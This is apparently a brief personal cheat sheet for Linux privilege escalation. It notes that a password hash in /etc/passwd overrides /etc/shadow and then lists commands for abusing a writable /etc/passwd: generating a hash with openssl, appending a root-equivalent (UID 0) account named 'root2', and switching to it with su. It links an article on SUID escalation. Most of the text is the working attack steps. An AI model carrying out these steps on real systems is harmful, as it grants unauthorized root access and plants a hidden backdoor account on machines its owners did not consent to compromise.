For backwards compatibility, if a password hash is present in the second column of a /etc/passwd user record, it is considered valid for authentication and it takes precedence over the respective entry in /etc/shadow if available.

check the permission of the /etc/passwd

1.generate password hash
openssl passwd gori
2. echo "root2:HASH:0:0:root:/root:/bin/bash" >> /etc/passwd 
3. su root2
password: gori

https://medium.com/go-cyber/linux-privilege-escalation-with-suid-files-6119d73bc620